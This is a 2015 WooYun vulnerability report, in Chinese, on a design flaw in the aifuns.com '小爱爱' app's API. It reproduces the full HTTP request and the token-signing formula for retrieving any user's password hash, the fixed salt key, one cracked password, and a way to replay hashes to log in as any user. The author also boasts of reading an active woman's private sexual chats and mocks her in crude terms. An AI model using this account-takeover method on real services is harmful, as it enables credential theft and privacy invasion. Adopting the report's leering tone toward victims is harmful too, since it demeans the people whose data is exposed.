当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141638

漏洞标题:小爱爱客户端设计缺陷查询任意用户密码/登陆任意用户(妹子们哥来啦)

相关厂商:aifuns.com

漏洞作者: 北京方便面

提交时间:2015-09-17 14:35

修复时间:2015-12-16 15:02

公开时间:2015-12-16 15:02

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-20: 细节向第三方安全合作伙伴开放
2015-11-11: 细节向核心白帽子及相关领域专家公开
2015-11-21: 细节向普通白帽子公开
2015-12-01: 细节向实习白帽子公开
2015-12-16: 细节向公众公开

简要描述:

小爱爱客户端设计缺陷查询任意用户密码/登陆任意用户(妹子们哥来啦)
我靠 这妹子几乎每天都要!

详细说明:

POST /api/v2/user/selectuser HTTP/1.1
Host: api.aifuns.com:80
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: %E5%B0%8F%E7%88%B1%E7%88%B1/31 CFNetwork/711.3.18 Darwin/14.0.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Length: 664
data=%7B%0A%20%20%22appver%22%20:%20%2231%22,%0A%20%20%22channel%22%20:%20%22appstore%22,%0A%20%20%22lang%22%20:%20%22zh-Hans%22,%0A%20%20%22tk%22%20:%20%22fe42ee7f808ecd625e5458c03bcb6f7e%22,%0A%20%20%22platform%22%20:%20%221%22,%0A%20%20%22ver%22%20:%20%221.0%22,%0A%20%20%22clientid%22%20:%20%2218714F45-788F-4458-81EB-81222A71A061%22,%0A%20%20%22token%22%20:%20%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOnsiY2xpZW50SWQiOiIxODcxNEY0NS03ODhGLTQ0NTgtODFFQi04MTIyMkE3MUEwNjEiLCJ1c2VySWQiOiI5MjU0MiJ9LCJpdWEiOjE0NDQ5ODkzNjJ9.E12htrjvdcZkQZG62mTZ29PlfYZKPgZeWcE9ZY5PcXE%22,%0A%20%20%22appid%22%20:%20%221%22,%0A%20%20%22aiainumlist%22%20:%20%221051136%22%0A%7D


发现此请求会获取到用户的密码
aiainumlist控制要获取密码的用户,这里还有个tk我们需要知道

9YR8%D`Y3$U3{U)NP]QWU6A.jpg


{"clientid":"8b821bf6-3267-34c0-8f47-fddf46f257aa","platform":"2","username":"***[email protected]","appid":"1","ver":"1.0","tk":"fecc3ff0058c206e2675f7ecbaae04bd","password":"d932e0bfa55edfc64ed836550f867a0b","lang":"zh","appver":"21"}
tk=md5(1218b821bf6-3267-34c0-8f47-fddf46f257aazhd932e0bfa55edfc64ed836550f867a0b2***[email protected])


更改aiainumlist 生成对应的tk 发送请求即可获取任意用户的密码
感谢瘦蛟舞的帮助
后来发现了一个更简单的方式:
步骤:
1、设置好抓包代理,给想要知道密码的账号发任意消息
2、返回消息菜单,在【聊天信息】列表里向下滑刷新列表
3、此时在找包工具内会发现【POST /api/v2/user/selectuser】的请求,Response内容就包含对方的账号密码

IMG_0704.PNG


IMG_0703.PNG


屏幕快照 2015-09-16 下午6.30.53.png


官方的账号密码
[email protected]
ef999040a889560c7cc386a11ad89752
分析客户端可知密码的加密key是app123 固定的 密码简单的可以解出来
[email protected]——a12345
但密码复杂的就无法破解了
但是我们测试发现登陆包POST内容如下:

{
  "appver" : "31",
  "password" : "c35c8bbf037eddeef20bed5083f0762f",
  "lang" : "zh-Hans",
  "channel" : "appstore",
  "platform" : "1",
  "ver" : "1.0",
  "tk" : "e44ac5d9a0b693177204621c33f2ea4e",
  "username" : "[email protected]",
  "clientid" : "18714F45-788F-4458-81EB-81222A71A061",
  "appid" : "1"
}


password就是md5(密码+key)
所以获取到的密码 我们可以直接用来改包登陆
我们以官方账号和小爱爱里比较活跃的妹子为例:
官方账号:

IMG_0710.PNG


IMG_0711.PNG


禽兽们 官方账号都不放过

IMG_0712.PNG


IMG_0713.PNG


IMG_0714.PNG


大胸妹:

IMG_0709.PNG


妹子太活跃了,测试过程中就有好几个人找她

IMG_0705.PNG


IMG_0706.PNG


IMG_0707.PNG


我靠 这妹子几乎每天都要!

IMG_0708.PNG

漏洞证明:

修复方案:

版权声明:转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-17 15:00

厂商回复:

感谢作者发现的问题,我们这2天也发现了这些问题,已经在着手进行处理。

最新状态:

暂无